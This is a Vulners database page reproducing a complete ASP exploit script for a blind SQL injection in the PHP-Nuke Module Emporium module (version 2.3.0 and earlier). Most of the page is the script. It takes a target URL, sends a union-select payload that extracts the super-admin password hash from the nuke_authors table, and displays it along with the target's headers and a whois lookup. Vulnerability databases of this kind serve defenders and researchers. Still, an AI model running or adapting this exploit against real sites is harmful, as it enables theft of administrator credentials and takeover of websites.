Vulners
Lucene search
phpnuke-sql.txt
`<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[S.Page : http://www.burnwave.com/
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
<%
title="Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title
%>
<html>
<title><% = title %></title>
<head>
<meta name="generator" content="Microsoft FrontPage 5.0">
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp"><u><% = title %>
</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></p>
</td>
<td width="50%">
<center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></form></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
If islem = "hata4" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Just Numeric Character!</font>"
End If
%>
<%
If islem = "get" Then
id= Request.Form("id")
file="modules.php?name=Shopping_Cart&file=category&category_id="
sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*"
idform = Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
IF Not IsNumeric(idform) Then
Response.Redirect("exploit2.asp?islem=hata4")
Else
%>
<%
target1 = targettext+file+sql
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
Dim metin
metin = take(target1)
Dim objReg
Set objReg = New RegExp
objReg.Global = True
objReg.IgnoreCase = True
objReg.Pattern = "0""><b>[A-Za-z0-9]+</b>"
Dim calistir, istediginString
Set calistir = objReg.Execute(metin)
If calistir.Count = 0 Then
Response.write "Not True"
Else
basusername = Replace(calistir.Item(0), "0""><b>" , "" )
basusername = Replace(basusername, "</b>" , "" )
End If
Set bulunanlar = Nothing
Set objReg = Nothing
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">Password Admin:</font></b></td>
<td width="80%">
<b><font color="#C0C0C0" size="2" face="Verdana"><%=basusername%></b></font></p>
</td>
</tr>
</table>
</center>
<br>
<%
hedef = targettext
Dim objem
Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
objem.Open "GET" , hedef , false
objem.sEnd
strHTML = objem.ResponseText
header=objem.getallResponseheaders()
Response.Write "<center>"
Response.Write "<b>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">Header Bilgileri</font></p>"
Response.Write "</b>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">" & header & "</font></p>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2""><b>Whois</b></font></p>"
Response.Write "<p><font size=""2"" color=""#008000"">Site:</font><font color=""#008000"" size=""1"">[google.com]</font></p>"
Response.Write "</center>"
Set objem=Nothing
%>
<center><form method="post" name="form2" action="exploit2.asp?islem=whois">
<p>
<input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000">
<input type="submit" value="Yolla" name="B1"></p>
</form></center>
<br>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="sdfsd">
</form>
<script language="JavaScript">
write()
functionControl1()
</script>
</b></font>
</body>
</html>
<%
End If
End If
End If
End If
End If
%>
<%
If islem = "whois" Then
site = Request.Form("whoissite")
target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
Set objtake = Nothing
End Function
remoteadres=take(target1)
dim baslangic , bitis
baslangic = "<pre>"
bitis = "</pre>"
dim x , abc
x = 0
abc = 0
dim sonuc
sonuc = ""
Do Until abc = 2
x = x + 1
If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
abc = abc + 1
End If
If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
abc = abc + 1
Else
If abc = 1 Then
sonuc = sonuc + Mid(remoteadres,x,1)
End If
End If
Loop
Set objtake=Nothing
%>
<center>
<b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
<textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
<% Response.Write "<" & sonuc %>
</textarea>
</p>
</center>
<center><form method="post" name="form2" action="exploit2.asp?islem=whois">
<p>
<input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000">
<input type="submit" value="Yolla" name="B1"></p>
</form></center>
<%
End If
%>
<%
Response.Write "<br>"
Response.Write "<center>"
Response.Write "<pre class=""info"">"
Response.Write "<font color=""#C0C0C0"" size=""1"">"
Response.Write "En iyi "
Response.Write "</font>"
Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">"
Response.Write "1152x864 "
Response.Write "</span></font>"
Response.Write "<font color=""#C0C0C0"" size=""1"">znrlk ve "
Response.Write "<span class=""info2""><font size=""1"" color=""#808080"">Firefox </font></span>"
Response.Write "ile grntlnebilir.</font></pre>"
Response.Write "<pre class=""info"">"
Response.Write "<font color=""#C0C0C0"" size=""1"">"
Response.Write "Exploit coded by "
Response.Write "</font>"
Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">"
Response.Write "ajann"
Response.Write "</span></font>"
Response.Write "</center>"
%>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4